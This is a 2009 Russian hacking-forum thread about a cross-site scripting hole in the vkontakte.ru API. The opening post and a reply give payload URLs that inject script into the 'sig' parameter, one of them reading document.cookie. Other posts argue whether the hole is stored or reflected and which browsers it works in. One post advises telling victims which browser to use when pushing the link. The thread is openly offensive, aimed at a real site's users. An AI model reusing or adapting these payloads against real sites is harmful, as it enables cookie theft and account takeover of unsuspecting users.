HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ФИНАНСОВЫЕ ЗАДАЧИ/СОЦИАЛЬНЫЕ СЕТИ > Социальные сети
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Active xss vkontakte.ru
  #1  
Старый 27.05.2009, 05:44
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию Active xss vkontakte.ru

http://api.vkontakte.ru/api.php?v=2.0&sig=%3Cscript%3Ealert(document.cooki e)%3C/script%3E&format=JSON&api_id=517649&method=getAppF riends

Добейте
 
Ответить с цитированием

  #2  
Старый 27.05.2009, 08:31
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию

Ты уверен, что это активка? =\
И в опере не катит =\
 
Ответить с цитированием

  #3  
Старый 27.05.2009, 08:40
Rebit
Участник форума
Регистрация: 07.08.2007
Сообщений: 136
С нами: 9874363

Репутация: 653
По умолчанию

Да в Опере не пашет и в Internet Explorer тоже
 
Ответить с цитированием

  #4  
Старый 27.05.2009, 09:22
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
С нами: 9765139

Репутация: 177
По умолчанию

слэш в закрывающем тэге экранируется, а так бы сработало
 
Ответить с цитированием

  #5  
Старый 27.05.2009, 10:10
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Изя лох это пассивка,

http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&form at=JSON&api_id=517649&method=getAppFriends
 
Ответить с цитированием

  #6  
Старый 30.05.2009, 12:04
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
С нами: 10566621

Репутация: 1198


По умолчанию

Цитата:
Сообщение от BlackSun  
Изя лох это пассивка,

http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&form at=JSON&api_id=517649&method=getAppFriends

:-D
:-D :-D
:-D :-D :-D :-D :-D :-D :-D
:-D :-D :-D :-D :-D :-D :-D :-D :-D
:-D :-D
:-D :-D :-D :-D
 
Ответить с цитированием

  #7  
Старый 27.05.2009, 10:20
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

А изя промазнулся, а изя проманхнулся
 
Ответить с цитированием

  #8  
Старый 06.06.2009, 01:55
F1shka
Banned
Регистрация: 10.04.2008
Сообщений: 618
С нами: 9518786

Репутация: 942


По умолчанию

Цитата:
Сообщение от wildshaman  
А изя промазнулся, а изя проманхнулся
АВРАМ ПЕРЕСТАНЬ ИЗДЕВАТЬСЯ НАД МАЛЕНЬКИМ!
 
Ответить с цитированием

  #9  
Старый 27.05.2009, 10:21
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

мб перенесете в приват? А то щас же школья набежит тут, а чо, а кто, а зачем это и т д...
 
Ответить с цитированием

  #10  
Старый 27.05.2009, 10:57
Sin3v
Участник форума
Регистрация: 16.07.2008
Сообщений: 159
С нами: 9379190

Репутация: 240
По умолчанию

Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.

Я две нашел в более легких условиях и где досих пор пашет))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Веб-уязвимости 1 19.09.2009 14:01
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.